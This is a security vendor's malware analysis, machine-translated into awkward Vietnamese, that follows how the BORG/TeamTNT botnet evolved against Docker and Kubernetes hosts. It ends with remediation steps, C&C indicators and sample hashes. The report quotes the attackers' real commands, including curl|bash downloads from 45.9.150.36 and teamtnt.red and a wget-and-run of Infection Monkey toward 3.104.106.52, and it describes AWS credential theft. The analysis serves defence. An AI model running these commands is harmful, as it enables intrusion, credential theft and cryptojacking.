Văn |Zeus thuẫn lưu lượng an toàn phân tích đoàn đội
Pav1, ngạn tu
Sự kiện tường thuật tóm lược
Ngày gần đây, Zeus thuẫn lưu lượng an toàn phân tích đoàn đội phát hiện đại lượng nhằm vào Docker, Kubernetes chờ phục vụ dị thường rà quét lưu lượng, chúng ta đối này thâm nhập phân tích phát hiện, một cái chuyên môn nhằm vào vật chứa giả thuyết hóa phục vụ cương thi internet trồi lên mặt nước, nhân này ở văn kiện trung đại lượng sử dụng BORG tự phù xuyến, chúng ta đem này mệnh danh là BORG cương thi internet.
Nên công kích giả thoát thai với trước đây TeamTNT tập thể, nhưng là ở trước mặt công kích trung bắt đầu dùng hoàn toàn mới vực danh cùng IP, chỉ có ở bộ phận so lúc đầu ác ý văn kiện trung phỏng vấn TeamTNT tương quan vực danh. Ngoài ra tương đối quan trọng một chút là công kích giả ở công kích thùng dụng cụ trung biên dịch cùng đóng gói đại lượng đến từ khai nguyên xã khu công kích hoặc khống chế lắp ráp, này năng lực cũng so phía trước cũng có rất lớn tiến hóa, công kích giả không hề thỏa mãn với xâm lấn lúc sau cấy vào đào quặng ngựa gỗ kiếm lời, mà là ở xâm lấn lúc sau bắt đầu đối nội võng trung mặt khác máy móc tiến hành dò xét cùng xâm lấn, cũng phê lượng khống chế này đó máy móc. Căn cứ vào này, chúng ta có lý do tin tưởng đây là một cái đang đứng ở khai phá trung, nhanh chóng tiến hóa cương thi internet.
Sự kiện phân tích
Bởi vì BORG cương thi internet tại tiến hành nhanh chóng thay đổi, cho nên bổn văn đem chọn dùng thời gian tuyến tới tiến hành phân tích, có thể càng thêm rõ ràng miêu tả nên cương thi internet tiến hóa phương hướng cùng kỹ thuật đổi mới.
1. Mới ra đời
Ở 2020 năm 12 nguyệt 28 ngày, Zeus thuẫn lưu lượng an toàn phân tích đoàn đội lần đầu tiên bắt được nhằm vào nên cương thi internet nhằm vào Docker công kích, bộ phận Payload như sau:
Lúc này nên cương thi internet truyền bá kịch bản gốc là aws.sh, như sau đồ sở kỳ:
Nên aws.sh kịch bản gốc chủ yếu công năng là thông qua AWS nguyên số liệu phục vụ tới thu hoạch bị cáo trưởng máy an toàn bằng chứng. Trong đó 169.254.269.254 là AWS nguyên số liệu phục vụ địa chỉ, có thể thông qua nên phục vụ tới ở EC2 ví dụ thực tế trung thu hoạch tương quan tin tức, nơi này công kích giả thu hoạch chính là cùng nên bị cáo ví dụ thực tế tương quan IAM nhân vật tin tức, trong đó bao hàm cùng nên nhân vật liên hệ lâm thời an toàn bằng chứng.
Đồng thời, nếu hoàn cảnh lượng biến đổi trung tồn tại “$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI” lượng biến đổi, tắc nhưng tới tuần tra bằng chứng, này bộ phận tình hình cụ thể và tỉ mỉ thấy AWS hồ sơ( phụ lục 1 )
Ở thu hoạch đến an toàn bằng chứng sau, công kích giả sẽ kiểm tra curl mệnh lệnh nhưng dùng tính, nếu không thể dùng tắc sẽ download curl trình tự, sau đó thông qua curl đem số liệu truyền đến chỉ định địa chỉ thượng, hoàn thành an toàn bằng chứng đánh cắp lưu trình, hơn nữa đối tương quan ký lục tiến hành rồi thanh trừ.
Có thể thấy được lúc ban đầu phiên bản ác ý kịch bản gốc công năng đơn giản, cũng không có bảo tồn cửa sau chờ, chỉ là đánh cắp tương quan an toàn bằng chứng, ở cái này giai đoạn, cũng không thể xưng là một cái cương thi internet. Chúng ta phân tích phát hiện, nên phiên bản cùng năm trước 8 tháng an toàn xã khu phát hiện ác ý văn kiện so sánh với cơ bản vô biến hóa, mà nên tập thể cũng nhân cái thứ nhất nhằm vào AWS bằng chứng tiến hành đánh cắp mà thanh danh vang dội.
2. Tiểu phúc đổi mới
Ở 2021 năm 1 nguyệt 1 ngày, Zeus thuẫn lưu lượng an toàn phân tích đoàn đội bắt được tới rồi nên cương thi internet lần đầu tiên tiến hóa, công kích Payload như sau sở kỳ:
Có thể thấy được không chỉ có đối đánh cắp kịch bản gốc tiến hành rồi thăng cấp, còn download cũng vận hành hiểu rõ một cái nhưng chấp hành trình tự rsMPpayload.
Đầu tiên tới xem aws2.sh cái này ác ý kịch bản gốc, thông qua phân tích phát hiện cũng không có tiến hành đại biến hóa, chỉ là tăng thêm hai nơi lọc thao tác, đem cùng key tương quan số liệu lọc ra tới tiến hành thượng truyền.
Kế tiếp xem rsMPpayload cái này nhưng chấp hành trình tự, chỉ có 251 byte, chủ yếu công năng là liên tiếp một cái ngạnh mã hóa IP ( 13.82.212.245 ), trước mắt nên IP đã vô pháp liên tiếp, nhưng là có thể cho rằng là nên công kích giả ở cố ý hướng về cương thi internet khống chế kết cấu đi phát triển.
3. Rơi vào cảnh đẹp
Nên cương thi internet ở ngắn hạn nội công kích Payload cùng xâm lấn sau hành vi nhiều lần biến hóa khiến cho chúng ta chú ý, ngay sau đó chúng ta tiến hành rồi trọng điểm theo dõi, ở 2021 năm 1 nguyệt 6 ngày phát hiện tân biến hóa, lần đầu bắt được tới rồi thỉnh cầu http: //45.9.150.36/t.sh lưu lượng, t.sh là hoàn toàn mới ác ý kịch bản gốc, như sau sở kỳ ( tỉnh lược download hàm số, nên hàm số vô biến hóa ):
Có thể thấy được, nên kịch bản gốc cũng không phải nhằm vào aws máy móc tiến hành an toàn bằng chứng, mà là trở nên càng thêm thông dụng. Công kích giả ở kịch bản gốc trung tăng thêm hiểu rõ thông qua tmate( phụ lục 2 )Trình tự tiến hành tập trung khống chế tương quan số hiệu, cơ bản logic là thu hoạch server nội tồn, CPU, hệ thống chờ tin tức, sinh thành session tự phù xuyến, sau đó thông qua kịch bản gốc ngạnh mã hóa IP[45.9.150.36] download đối ứng tmate trình tự cùng giấy chứng nhận.
Sau đó vận hành tmate trình tự, sử dụng download giấy chứng nhận cùng session tự phù xuyến làm tham số tiến hành online. Trong đó session tự phù xuyến cách thức vì Base64_encode(IP)+XXXXXXXX+ tùy cơ con số. Cuối cùng thông qua HTTP thỉnh cầu đăng báo tương quan server tin tức.
Lúc này, công kích giả có thể thông qua tmate phục vụ tới nhằm vào nên cương thi trưởng máy tiến hành quản lý, đã hình thành cương thi internet khống chế kết cấu. Công kích giả ở bị cáo cơ thượng tuyến sau cũng không có trước tiên chấp hành tương quan mệnh lệnh, mà là ở trải qua 24 giờ chờ đợi sau, mới hạ phát mặt khác mệnh lệnh, “curl -s http://45.9.150.36/pwn/lan.sh | bash”.
Ở lan.sh kịch bản gốc trung, chủ yếu làm hai việc, đầu tiên là trang bị masscan:
Sau đó thông qua masscan nhằm vào nội võng võng đoạn tiến hành rà quét, phán đoán hay không tồn tại mở ra "2375", "2376", "4243", "8181", "6379", "10250", cũng đem kết quả bảo tồn xuống dưới, nếu tìm được rồi mở ra 10250, sau đó tiến hành công kích, trước mắt bắt được hàng mẫu trung, công kích giả chỉ đối 10250 cảng tiến hành rồi công kích, có thể thấy được này chỉ là cái bán thành phẩm, kế tiếp khả năng sẽ tăng thêm nhằm vào kể trên rà quét phi 10250 cảng công kích hàm số.
Nhằm vào 10250 cảng công kích chủ yếu mục đích download đào quặng chân vốn dĩ tiến hành đào quặng.
Trừ bỏ cái này mệnh lệnh ở ngoài, công kích giả còn thông qua tmate phát xuống
“curl -s http://45.9.150.36/outgoing/script_files/xmr3.assi | bash” đào quặng mệnh lệnh.
Lúc sau công kích giả còn phát xuống “curl -# -Lk" https://teamtnt.red/set/up/pei.php?dlmode=curl "| bash” mệnh lệnh cùng “curl -# -Lk" https://teamtnt.red/set/up/bob.php?dlmode=curl "| bash”, thông qua này hai cái chân vốn dĩ download ác ý trình tự, nhằm vào nội võng http, sockets, docker, k8s chờ phục vụ tiến hành rồi công kích.
Thông qua đối “https://teamtnt.red/set/up/pei.php?dlmode=curl” download ác ý trình tự pei tiến hành phân tích, có thể phán đoán là Peirates khai nguyên công cụ( phụ lục 3 ),Peirates là Kubernetes thẩm thấu thí nghiệm công cụ, chuyên chú với đặc quyền tăng lên cùng nằm ngang di động.
Thông qua đối “https://teamtnt.red/set/up/ bob.php?dlmode=curl” download ác ý trình tự bob tiến hành phân tích, có thể phán đoán là botb( phụ lục 4 )Khai nguyên công cụ, BOtB là một khoản vật chứa phân tích cùng phát hiện công cụ, chỉ ở cung thẩm thấu thí nghiệm nhân viên cùng kỹ sư sử dụng. Về này hai khoản công cụ sử dụng có thể xem xét này hồ sơ.
Cuối cùng công kích giả chấp hành “wget --no-check-certificate https://3.104.106.52:5000/api/monkey/download/monkey-linux-64; chmod +x monkey-linux-64;./monkey-linux-64 m0nk3y -s 3.104.106.52:5000 “, thông qua download Infection Monkey( phụ lục 5 )Trình tự tới tiến hành tiến thêm một bước quyền hạn duy trì cùng nằm ngang di động.
Infection Monkey là một khoản khai nguyên an toàn công cụ, bổn ý là dùng để thí nghiệm số liệu trung tâm đối ngoại vây lỗ hổng cùng bên trong server cảm nhiễm khôi phục năng lực, Monkey sử dụng các loại phương pháp ở số liệu trung tâm nội tiến hành tự mình truyền bá, cũng hướng tập trung Monkey Island server báo cáo thành công tình huống. Công kích giả thông qua Infection Monkey tới thực hiện viễn trình khống chế cùng kế tiếp công kích bước đi.
Thu lợi phân tích
Thông qua đối nên cương thi internet sở sử dụng đào quặng trình tự tiến hành nghịch hướng, phân tích ra này sử dụng chính là khai nguyên công cụ đào mỏ xmrig( phụ lục 6 ).
Thông qua phân tích có thể thu hoạch đến nên đào quặng trình tự phối trí văn kiện, sở khai quật tệ loại là môn la tệ, thông qua tìm tòi có thể thấy được nên địa chỉ còn dư ở 4 cái Worker, đã sản xuất 10+ cái môn la tệ. Trước mắt nên địa chỉ cuối cùng lực ở 23KH/s, căn cứ i5 2300 có 175H/s đào quặng tính lực suy tính, trước mắt nên cương thi internet đào quặng tính lực tương đương với 1300+ đài i5 2300 máy móc đào quặng tính lực.
Tổng kết
Thông qua nhằm vào BORG cương thi internet phát triển chải vuốt, có thể thấy được đây là một cái đang không ngừng ưu hoá công kích sức chịu đựng cùng khống chế kết cấu cương thi internet. Không khó phát hiện, công kích giả ở xây dựng một cái hoàn chỉnh cương thi internet khi cũng không phải một lần là xong, mà là sẽ không ngừng tiến hành đổi mới thay đổi. Đồng thời, nên cương thi internet một đại đặc điểm là đại lượng sử dụng nhằm vào giả thuyết hóa ngôi cao tiến hành công kích khai nguyên công cụ, hơn nữa ở khống chế cương thi trưởng máy khi đại lượng sử dụng công cộng khai nguyên lắp ráp, do đó tăng lớn kiểm tra đo lường khó khăn.
Xử trí kiến nghị
1. Nên cương thi internet chủ yếu thông qua Docker, k8s chờ lắp ráp chưa trao quyền lỗ hổng tiến hành truyền bá, thỉnh nhằm vào loại này lắp ráp tiến hành an toàn gia cố, tăng thêm an toàn nghiệm chứng.
2. Kiểm tra hay không tồn tại
"/var/tmp/.../...BORG...", "/dev/shm/.../...BORG..." Mục lục cùng phi nghiệp vụ sử dụng tmate tiến trình, nếu tồn tại thỉnh kịp thời thanh trừ.
3. Kiểm tra
"/usr/local/lib/curl.so", "/usr/local/lib/awk.so", "/usr/local/lib/bash.so", "/usr/local/lib/cat.so", "/usr/local/lib/grep.so", "/usr/sbin/zgrab", "/usr/sbin/zgrab.so", "/usr/sbin/jq", "/usr/sbin/jq.so" chờ văn kiện hay không tồn tại hoặc là bị sửa chữa.
4. Kiểm tra hay không tồn tại CPU chiếm dụng dị thường tiến trình cùng tên là xmrig, monkey tiến trình.
Tương quan IOC
C&C
the[.]borg[.]wtf
borg[.]wtf
teamtnt[.]red
projectbluebeam[.]anondns[.]net
45[.]9.150.36
45[.]9.148.108
3[.]104.106.52
SAMPLES MD5
0462ea0efbe86b2347bae553ea8107f0
4aa866946c85283ee433a465e84a2a08
b7d4e2cdff4804a74e37853900dc43b4
95275f19de1a5790b2dd503ba9d7cc7f
80c202ced80965521adf1d63ba6be712
2fae684f1e75714518f4fe156dcc13d8
23836f29f827dc6ebaf4133a6a01fd25
9c4db9e992d02212f09deb5e20a6e564
d1349b288869cbec2a001e92295952ff
7473f2040c8507d0fee9a422560f0cb4
5138eab75c3a09f8f300767e202ea622
0aa3a3d10f633b685b229cecb68c0b68
ee07542f7dba6a60342424faf92af201
fe9d149dec9cd182254ace576a332f56
3d4e5ec8ea149cc51699b15f5738ca23
04b9b25ba894ec98ff8fc26011f6ed82
54fd9e30b7be75600fc9dc4c76fa420a
6f9aa12200dd05d2452d5f4fd808d939
ebf1ed323b01cee04bae21e395edea3f
acf87e0165bc121eb384346d10c74997
1fccc4f70c2c800173b7c56558b74a95
45465406ea00c97a100ecfe638ce7f37
557af488f1cb0dea9819c40bb99ddb29
8e9a927abba3fe269d24fc9f6bfe197d
15ef5bc64545fcb21b168697a1314cf1
769a36672cb4f421be3d3f717107eb3f
e11bae43ed3ed91843bdd6707fed72a3
b539a3b83503982f376c7b113e9dce58
b41503f88e87095fdd770702fba40bab
18fb92e5761a0fbc3d9851e13ea7a051
6a8a351eb2689c98f0bf555ef40c8576
c49bc0dd9ffdb733e4bdc08b7dd86f7c
4e722178f77bfbc31583c5ab1bcd632a
d8f32d78f1659389d289762450bfc276
20540a97d45a729de9bcb59d68dd9153
9150b0d3569152767e3f720014084be4
bef69d12e4b1a99b676bf6f7ce51f575
92490c9b9d3bb59aca5f106e401dfcaa
dbd9262092c016245b03b646e04aad3b
Phụ lục
1.https://docs.aws.amazon /AmazonECS/latest/developerguide/task-iam-roles.html
2. https://github /tmate-io/tmate/
3. https://github /inguardians/peirates
4. https://github /brompwnie/botb
5. https://github /guardicore/monkey
6. https://github /xmrig/xmrig
Về Zeus thuẫn lưu lượng an toàn phân tích đoàn đội
Zeus thuẫn lưu lượng an toàn phân tích đoàn đội lệ thuộc với Đằng Tấn an toàn ngôi cao bộ, dựa vào Đằng Tấn an toàn ngôi cao bộ mười lăm năm an toàn kinh nghiệm chế tạo công ty cấp an toàn hệ thống, ngắm nhìn căn cứ vào lưu lượng công kích kiểm tra đo lường, xâm lấn kiểm tra đo lường, lưu lượng chặn cùng với uy hiếp tình báo xây dựng cùng rơi xuống đất công tác, không ngừng khai quật lưu lượng trung an toàn nguy hiểm cũng mở rộng ứng dụng cảnh tượng, kết hợp đại số liệu, AI chờ tuyến đầu kỹ thuật, xây dựng internet lưu lượng thọc sâu phòng ngự hệ thống.
Trí tạ
Cảm tạ cách vách Tencent Blade Team leonwxqian sư phó cung cấp ác ý văn kiện phân tích trợ giúp.
Chúng ta là TSRC
Internet an toàn người thủ hộ
Người dùng số liệu an toàn bảo vệ giả
Chúng ta tìm lỗ hổng, tra xâm lấn, phòng công kích
Cùng an toàn ngành sản xuất tinh anh nắm tay cộng kiến internet sinh thái an toàn
Chờ mong chính năng lượng ngươi cùng chúng ta kết minh!
Số WeChat:tsrc_team